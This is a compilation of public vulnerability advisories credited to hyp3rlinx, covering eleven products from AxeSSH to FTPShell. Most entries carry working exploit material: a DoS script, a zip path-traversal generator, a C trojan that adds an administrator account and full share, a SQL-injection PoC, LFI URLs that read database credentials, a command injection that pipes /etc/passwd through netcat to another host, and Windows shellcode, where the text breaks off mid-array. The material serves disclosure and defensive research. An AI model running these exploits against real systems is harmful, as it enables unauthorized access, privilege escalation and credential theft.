Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, 
AES256-cbc
Authentication using password
Authentication RSA
Compression support
Connection forwarding, including full support for X-protocol connection 
forwarding
"Dynamic Forwarding" which provides other tasks on the same PC with requested 
port forwarding 



Vulnerability Type:

Denial Of Service

AxeSSH will crash after receiving a overly long payload of junk...



Exploit code(s):
===

1) Open the settings window for axessh and choose Run then click Run as EXE, 
this will launch "xwpsshd.exe"
crashes with bad protocol version.


import socket

print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"

ip = raw_input("[IP]> ")
port = 22
payload="A"*2000
s=socket.create_connection((ip,port))
s.send(payload)



Exploitation Technique:
===
Remote



Severity Level:

Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

wincvs-2.0.2.4 Privilege Escalation

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WINCVS-PRIVILEGE-ESCALATION.txt

[+] ISR: ApparitionSec



Vendor:
==
cvsgui.sourceforge.net
www.wincvs.org


Product:
===
WinCvs v2.1.1.1 (Build 1)
downloads as wincvs-2.0.2.4
v2.0.2.4 


WinCVS is a free app for Windows that will help you simplify the development of 
files for groups of people working on
the same software project.


Vulnerability Type:
=
Privilege Escalation



CVE Reference:
==
N/A



Vulnerability Details:
=

WinCvs.exe installs a service with an unquoted service path running with SYSTEM 
privileges, to exploit a local attacker must place 
a malicious executable file named "Program.exe" in the path of the service. 
After service restart or system reboot, it could
potentially allow an authorized local user to execute arbitrary code with 
elevated privileges on the system.



Proof:
==

C:\Users\hyp3rlinx>sc qc CVS
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: CVS
TYPE   : 110  WIN32_OWN_PROCESS (interactive)
START_TYPE : 2   AUTO_START
ERROR_CONTROL  : 1   NORMAL
BINARY_PATH_NAME   : C:\Program Files (x86)\cvsnt\cvsservice.exe
LOAD_ORDER_GROUP   :
TAG: 0
DISPLAY_NAME   : CVSNT
DEPENDENCIES   :
SERVICE_START_NAME : LocalSystem



Exploitation Technique:
===
Local



Severity Level:

Medium




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Puppet Enterprise Web Interface User Enumeration

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PUPPET-USER-ENUMERATION.txt

[+] ISR: ApparitionSec



Vendor:
==
www.puppet.com



Product:
===
Puppet Enterprise Web Interface

Tested in version < 2016.4.0

Puppet Enterprise is the leading platform for automatically delivering, 
operating and securing your infrastructure.



Vulnerability Type:
===
User Enumeration



CVE Reference:
==
N/A



Vulnerability Details:
=

By sending remote HTTP request to Puppet Enterprise Web Interface it is 
possible to enumerate valid user account names by sending more than 10 requests.
If user does not exist we will continue to get  'Authentication failed.' HTTP 
response from the victim server. However, if the user does exist we
will no longer receive such a message confirming the user exists. 



Exploit code(s):


Send login request 11 times, after 10 we will know if user exists or not.

FOR /l %i in (1,1,11) DO curl -k  
https://victim-puppet-server/auth/login?redirect=Enum-Users  -d 
username=IDONTEXIST -d password=1

HTTP 200 OK
'Authentication failed.'

FOR /l %i in (1,1,11) DO curl -k  
https://victim-puppet-server/auth/login?redirect=Enum-Users -d username=BOZO -d 
password=1 

HTTP 200 OK



Disclosure Timeline:
===
Vendor Notification:  August 23, 2016
Vendor Acknowledgement: August 23, 2016
Vendor Releases Version: 2016.4.0
October 17, 2016  : Public Disclosure




Severity Level:

Low



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Puppet Enterprise Web Interface Authentication Redirect

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PUPPET-AUTHENTICATION-REDIRECT.txt

[+] ISR: ApparitionSec



Vendor:
==
www.puppet.com



Product:

Puppet Enterprise Web Interface 
Version < 2016.4.0

Puppet Enterprise is the leading platform for automatically delivering, 
operating and securing your infrastructure.


Vulnerability Type:
=
Authentication Redirect



CVE Reference:
==
CVE-2016-5715



Vulnerability Details:
=

When logging into Puppet Enterprise Web Interface, users can be redirected to 
attacker controlled servers, if a user logs in
using an attacker supplied authentication link it can result in credential 
theft etc.

Fixed in version 2016.4.0

References:
https://puppet.com/security/cve/cve-2016-5715


Exploit code(s):
===

Bypass character filters you need to pass double forward slashes "//" or the 
redirect will fail.

https://victim-puppet-server/auth/login?redirect=//attacker-server



Disclosure Timeline:
==
Vendor Notification: August 23, 2016
Vendor Acknowledgement: August 23, 2016
Vendor Releases Fix: in version 2016.4.0
October 17, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

Medium




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Oracle Netbeans IDE v8.1 Import Directory Traversal

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ORACLE-NETBEANS-IDE-DIRECTORY-TRAVERSAL.txt

[+] ISR: ApparitionSec



Vendor:
===
www.oracle.com



Product:
=
Netbeans IDE v8.1



Vulnerability Type:
=
Import Directory Traversal  



CVE Reference:
==
CVE-2016-5537



Vulnerability Details:
=

This was part of Oracle Critical Patch Update for October 2016.

Vulnerability in the NetBeans component of Oracle Fusion Middleware 
(subcomponent: Project Import).
The supported version that is affected is 8.1. Easily exploitable vulnerability 
allows high privileged attacker with logon
to the infrastructure where NetBeans executes to compromise NetBeans. While the 
vulnerability is in NetBeans, attacks may significantly
impact additional products. Successful attacks of this vulnerability can result 
in unauthorized update, insert or delete access to some
of NetBeans accessible data as well as unauthorized read access to a subset of 
NetBeans accessible data and unauthorized ability to cause
a partial denial of service (partial DOS) of NetBeans. 

Vulnerability in way Netbeans processes  ".zip" archives to be imported as 
project. If a user imports a malicious project 
containing "../" characters the import will fail, yet still process the "../".  
we can then place malicious scripts outside of
the target directory and inside web root if user is running a local server 
etc...

It may be possible to then execute remote commands on the affected system by 
later visiting the URL and access our script if that
web server is public facing, if it is not then it may still be subject to abuse 
internally by internal malicious users. Moreover,
it is also possible to overwrite files on the system hosting vulnerable 
versions of NetBeans IDE.


References:
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixFMW


Exploit Code(s):
=

, , ";exit();}
 $zipname=$argv[1];
 $exploit_file="RCE.php";
 $cmd='';
 if(!empty($argv[2])&_numeric($argv[2])){
 $depth=$argv[2];
 }else{
 echo "Second flag  must be numeric!, you supplied '$argv[2]'";
 exit();
 }
 if(strtolower($argv[3])!="y"){
 if(!empty($argv[3])){
 $exploit_file=$argv[3];
 }
 if(!empty($argv[4])){
 $cmd=$argv[4];
 }else{
 echo "Usage: enter a payload for file $exploit_file wrapped in double
 quotes";
 exit();
 }
 }
 $zip = new ZipArchive();
 $res = $zip->open("$zipname.zip", ZipArchive::CREATE);
 $zip->addFromString(str_repeat("..\\",
 $depth)."\\xampp\\htdocs\\".$exploit_file, $cmd);
 $zip->close();
 echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
 echo " hyp3rlinx ===";
?>


Disclosure Timeline:
===
Vendor Notification: September 20, 2016
October 20, 2016 : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:
=
CVSS VERSION 3.0 RISK 
5.7



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Snort v2.9.7.0-WIN32 DLL Hijack

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/SNORT-DLL-HIJACK.txt

[+] ISR: ApparitionSec



Vendor:
=
www.snort.org



Product:
===
Snort v2.9.7.0-WIN32

Snort is an open-source, free and lightweight network intrusion detection 
system (NIDS) software for Linux and Windows to detect emerging threats.


Vulnerability Type:
===
DLL Hijack



CVE Reference:
==
CVE-2016-1417



Vulnerability Details:
=

snort.exe can be exploited to execute arbitrary code on victims system via DLL 
hijacking, the vulnerable DLL is "tcapi.dll".
If a user opens a ".pcap" file from a remote share using snort.exe and the DLL 
exists in that directory. 


Exploit codes(s):
=

Create tcapi.dll 

#include

//gcc -c tcapi.c
//gcc -shared -o tcapi.dll tcapi.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
MessageBox(NULL, "DLL Hijacking", "Done!", MB_OK);  
break;
  }

return 0;
}

1) create any empty file on a remote dir share with a .pcap extension
2) place arbitrary DLL named  "tcapi.dll" in remote share
3) open with snort.exe
4) BAM!




Disclosure Timeline:
===
Vendor Notification:  April 21, 2016
September 29, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

Medium




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

ZendStudio IDE v13.5.1 Privilege Escalation

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ZEND-STUDIO-PRIVILEGE-ESCALATION.txt

[+] ISR: ApparitionSec



Vendor:

www.zend.com



Product:
==
ZendStudio IDE v13.5.1

Zend Studio is the leading PHP IDE. It is the only PHP IDE that combines mobile 
development with PHP and includes a sample mobile
app with source code.



Vulnerability Type:
=
Privilege Escalation



CVE Reference:
==
N/A


Vulnerability Details:
=

ZendStudio IDE uses weak insecure permissions settings on its files/directory 
as the “Everyone” group has full access on it.
Allowing low privileged users to execute arbitrary code in the security context 
of ANY other users with elevated privileges
on the affected system.

"Everyone" encompasses all users who have logged in with a password as well as 
built-in, non-password protected accounts such as Guest
and LOCAL_SERVICE.

Any user (even guest) will be able to replace, modify or change the file. This 
would allow an attacker the ability to inject code or
replace the ZendStudio executable and have it run in the context of the system.


e.g.

c:\Program Files (x86)\Zend\Zend Studio 13.5.1> icacls ZendStudio.exe

ZendStudio.exe Everyone:(I)(F)
   NT AUTHORITY\SYSTEM:(I)(F)
   BUILTIN\Administrators:(I)(F)
   BUILTIN\Users:(I)(RX)


x86_64 version ...


c:\Program Files\Zend>icacls * | more
Zend Studio 13.5.1 Everyone:(F)
   Everyone:(OI)(CI)(IO)(F)
   NT SERVICE\TrustedInstaller:(I)(F)
   NT SERVICE\TrustedInstaller:(I)(CI)(I
   NT AUTHORITY\SYSTEM:(I)(F)
   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F
   BUILTIN\Administrators:(I)(F)
   BUILTIN\Administrators:(I)(OI)(CI)(IO
   BUILTIN\Users:(I)(RX)
   BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
   CREATOR OWNER:(I)(OI)(CI)(IO)(F)



Exploit code(s):
===

1) Compile below 'C' code name it as "ZendStudio.exe"


#include

int main(void){
 system("net user hacker abc123 /add");
 system("net localgroup Administrators hacker  /add");
 system("net share SHARE_NAME=c:\ /grant:hacker,full");
 WinExec("C:\\Program Files (x86)\\Zend\\Zend Studio 
13.5.1\\~ZendStudio.exe",0);
return 0;
} 


2) Rename original "ZendStudio.exe" to "~ZendStudio.exe"


3) Place our malicious "ZendStudio.exe" in the ZendStudio directory


4) Logout and wait for a more privileged user to login and use ZendStudio IDE 
then BOOM! later,
go back and login with your shiny new account.



Disclosure Timeline:

Vendor Notification: September 30, 2016
October 8, 2016 : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:
===
High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

WSO2-CARBON v4.4.5 LOCAL FILE INCLUSION

[apparitionsec]

[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt

[+] ISR: ApparitionSec


Vendor:
===
www.wso2.com



Product:

Ws02Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. 
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and 
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware 
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific 
features needed to solve a specific enterprise scenario.



Vulnerability Type:
=
Local File Inclusion (LFI)



CVE Reference:
==
CVE-2016-4314



Vulnerability Details:
=

An authenticated user can download configuration files in the filesystem via 
downloadArchivedLogFiles operation in LogViewer admin service.
The request to the admin service accepts a file path relative to the carbon log 
file directory (i.e. /repository/logs)
hence can access any file in the file system.


References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098


Example: accessing the registry.xml file via Local File Inclusion exposes the 
MySQL passwords.

mysql-db

jdbc:mysql://localhost:3306/regdb
regadmin
regadmin
com.mysql.jdbc.Driver
80
6000
5




Exploit code(s):
===

LFI to read Database creds, truststore key file, web.xml etc...

1) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml==

2) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml

3) Access Truststore Key file.
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks
 

4) Read web.xml
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml



Disclosure Timeline:
===
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:
===
High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX

VMWare vSphere Web Client Flash XSS

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/VMWARE-VSPHERE-FLASH-XSS.txt

[+] ISR: apparitionsec




Vendor:
===
www.vmware.com



Product:

VMWare vSphere Web Client v5.1 - 6.0

A server virtualization platform from VMware. Also referred to as a cloud 
operating system or virtualized data center platform, VMware vSphere enables
IT departments to efficiently place application workloads on the most 
cost-effective compute resource available

VMware vSphere includes the VMware ESX / ESXi hypervisor, a type 1 hypervisor 
that functions as the virtualization server; the VMware vCenter Server,
which manages vSphere environments; the VMware vSphere Client, which is used to 
install and manage virtual machines through the hypervisor; and
VMware VMFS, the file system component from VMware.


Vulnerability Type:

Flash XSS



CVE Reference:
==
CVE-2016-2078



Vulnerability Details:
=

VMWare vSphere Web Client is vulnerable to Flash based XSS through the loading 
of arbitrary .SWF files via 'flashvars' parameter. Flashvars is a
Flash Player feature that allows passing of variables to the '_root' level of a 
Flash movie from the hosting webpage. Attackers can exploit this
to call arbitrary Flash actionscript functions on the victims Flash Player 
client through attacker supplied SWF files that execute in the same
security context as that of vSphere Web Client.


e.g.


flashvars: 
'locale=en_US=en_US=locales/UI-en_US.swf=http%3A%2F%2Fattacker-site%2FEvil.swf',



References:

VMSA-2016-0006

http://www.vmware.com/security/advisories/VMSA-2016-0006.html



Exploit code(s):
===


1) Attacker server needs Flash policy file "crossdomain.xml" It grants Flash 
Player permission to talk to servers other than
the one it's hosted on. This will allow victim server ability to talk to the 
evil server.

e.g.








2) Send infected linx to the victim. 

https://victim:9443/vsphere-client/ui.jsp?resourceModuleURLs=http://attacker-site/Evil.swf



Disclosure Timeline:
=
Vendor Notification: Jan 4, 2016
May 25, 2016 : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:
===
4.2 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N



Description:

Request Method(s):[+] GET


Vulnerable Product:   [+] VMWare 5.1 - 6.0 vsphere-client


Vulnerable Parameter(s):  [+] flashvars / resourceModuleURLs


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

PHPBack v1.3.0 SQL Injection

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PHPBACK-v1.3.0-SQL-INJECTION.txt




Vendor:

www.phpback.org



Product:

PHPBack v1.3.0



Vulnerability Type:
===
SQL Injection




CVE Reference:
==
N/A



Vulnerability Details:
=

PHPBack v1.3.0 is vulnerable to boolean blind and error based SQL Injection in 
the 'orderby' parameter.
By sending SQL Injection query using MySQL XPATH function ExtractValue() we can 
grab information
from the errors generated.

This is useful when we get no output except MySQL errors, we can force data 
extraction through the error. 
When using ExtractValue() function to generate error, evaluated results of our 
SQL query will be embedded
in query error message. Adding a colon "0x3a" to the beginning of the query 
will ensure parsing will always
FAIL generating an error along with our extracted data. This method only works 
on MySQL version >= 5.1, we can
then use SQL LIMIT function to move thru database informations.


Users should upgrade to v1.3.1
https://github.com/ivandiazwm/phpback/releases



Exploit code(s):
===

Run from CL...

= 5.1 only
#

$email=$argv[1];
$pwd=$argv[2];

if($argc<3){
echo "PHPBack 1.3.0 SQL Injection POC\r\n";
echo "Outputs USER(), DATABASE() and VERSION() on XPATH Error!\r\n";
echo "Supported in MySQL >= 5.1 versions only\r\n";
echo "==\r\n";
echo "Enter Creds:  \r\n";
echo "*** by hyp3rlinx *** \r\n";
exit();
}

$target="localhost";
$creds="email=$email=$pwd"; 

$fp = fsockopen("localhost", 80, $errno, $errstr, 30);
sock_chk($fp);

#authenticate
$out = "POST /phpback-1.3.0/action/login HTTP/1.0\r\n";
$out .= "Host: $target\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($creds) . "\r\n";
$out .= "Connection: Close\r\n\r\n";

fwrite($fp, $out);
fwrite($fp, $creds);
$phpsess="";
$res="";

while (!feof($fp)) {
$res .= fgets($fp, 128);
if(strpos($res,"\r\n\r\n")!==FALSE){break;}
}

$sess=get_session($fp);

function get_session($sock){
global $res;
$idx=strpos($res,"PHPSESSID");
$sess=substr($res,$idx,38);
return $sess;
}

#SQL Injection  
$sql="search=1=title,extractvalue(0x0a,concat(0x0a,(select USER()), 
0x0a, (select DATABASE()), 0x0a, (select VERSION(\r\n";

$fp = fsockopen("localhost", 80, $errno, $errstr, 30);
sock_chk($fp);

$out = "POST /phpback-1.3.0/admin/ideas HTTP/1.0\r\n";
$out .= "Host: $target\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($sql) . "\r\n";
$out .= "Cookie: " . $sess."\r\n";
$out .= "Connection: Close\r\n\r\n";

fwrite($fp, $out);
fwrite($fp, $sql);

while (!feof($fp)) {
echo fgets($fp, 128);
}
fclose($fp);

function sock_chk(&$fp){
if (!$fp) {echo "Cant connect!";exit();} 
}

?> 



Disclosure Timeline:
=
Vendor Notification: April 17, 2016
Vendor Confirms: April 17, 2016
Vendor Release Fixed Version: April 19, 2016
April 19, 2016 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

Medium



Description:
==

Request Method(s):[+]  POST


Vulnerable Product:   [+] PHPBack v1.3.0


Vulnerable Parameter(s):  [+] 'orderby'



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere. All content (c) hyp3rlinx.

by hyp3rlinx

op5 v7.1.9 Remote Command Execution

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/OP5-REMOTE-CMD-EXECUTION.txt



Vendor:

www.op5.com



Product:
===
op5 v7.1.9

op5 Monitor is a software product for server, Network monitoring and management 
based on the open source Project Nagios.



Vulnerability Type:

Remote Command Execution




CVE Reference:
==
N/A



Vulnerability Details:
=

op5 has a CSRF entry point that can be used to execute arbitrary remote 
commands on op5 system sent via HTTP GET requests, allowing attackers
to completely takeover the affected host, to be victimized a user must be 
authenticated and visit a malicious webpage or click an infected link...

Reference:
https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/


Exploit code(s):
===

trivial RCE cat /etc/passwd... using netcat

nc.exe  -vvlp  > passwds.txt

https://192.168.1.103/monitor/op5/nacoma/command_test.php?cmd_str=/bin/cat%20/etc/passwd%20|%20nc%20192.168.1.102%20


result:

listening on [any]  ...
192.168.1.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.1.102] from (UNKNOWN) [192.168.1.103] 56935: NO_DAT
 sent 0, rcvd 1343

C:\netcat-win32-1.12>type passwds.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smstools:x:499:499::/var/lib/smstools:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
op5lsu:x:500:500::/home/op5lsu:/bin/bash
saslauth:x:498:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
monitor:x:299:48::/opt/monitor:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin



Disclosure Timeline:

Vendor Notification:  March 27, 2016
Vendor confirms vulnerability March 27, 2016
Vendor issue patched new release v7.2.0 April 5, 2016
April 6, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High




Description:
=


Request Method(s):[+] GET


Vulnerable Product:   [+] op5 v7.1.9


Vulnerable Parameter(s):  [+] 'cmd_str'

=

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

hyp3rlinx

FTPShell Client v5.24 Buffer Overflow

[apparitionsec]

[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/FTPSHELL-v5.24-BUFFER-OVERFLOW.txt



Vendor:

www.ftpshell.com



Product:

FTPShell Client version 5.24

FTPShell client is a windows file transfer program that enables users to 
reliably transfer files,
upload to websites, and download updates from the internet.


Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A




Vulnerability Details:
=
ftpshell.exe client has a buffer overflow entry point in the 'Address' input 
field used to connect to an FTP server.
Allowing local arbitrary code execution by overwriting several registers on the 
stack and controlling program execution flow.
EIP register will be used to jump to our malicious shellcode which will be 
patiently waiting in ECX register.

exploited registers dump...

EAX 0021
ECX 0012E5B0
EDX 76F670B4 ntdll.KiFastSystemCallRet
EBX 76244FC4 kernel32.76244FC4
ESP 0012E658 ASCII "calc.exe"   <- BAM!
EBP 7621E5FD kernel32.WinExec
ESI 001D2930
EDI 76244FEC kernel32.76244FEC
EIP 015FB945
C 0  ES 0023 32bit 0()
P 1  CS 001B 32bit 0()
A 0  SS 0023 32bit 0()
Z 1  DS 0023 32bit 0()
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS  NULL
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 00200246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
   3 2 1 0  E S P U O Z D I
FST C5E1  Cond 1 1 0 1  Err 1 1 1 0 0 0 0 1  (Unordered)
FCW 1372  Prec NEAR,64  Mask1 1 0 0 1 0


test stack dump

(3b8.fa0): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for ftpshell.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
ftpshell.exe - 
eax=41414141 ebx=017ebc70 ecx=017ebc70 edx=0012ebc8 esi=0012ebc8 edi=017a9498
eip=41414141 esp=0012e928 ebp=0012ea70 iopl=0 nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00210202
41414141 ??  ???



Exploit code(s):
===

import struct

#FTPShell Client version 5.24 - www.ftpshell.com
#Buffer Overflow Exploit
#by hyp3rlinx
#run to generate payload, then copy and inject
#into the 'Address' field on the client and BOOM!

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
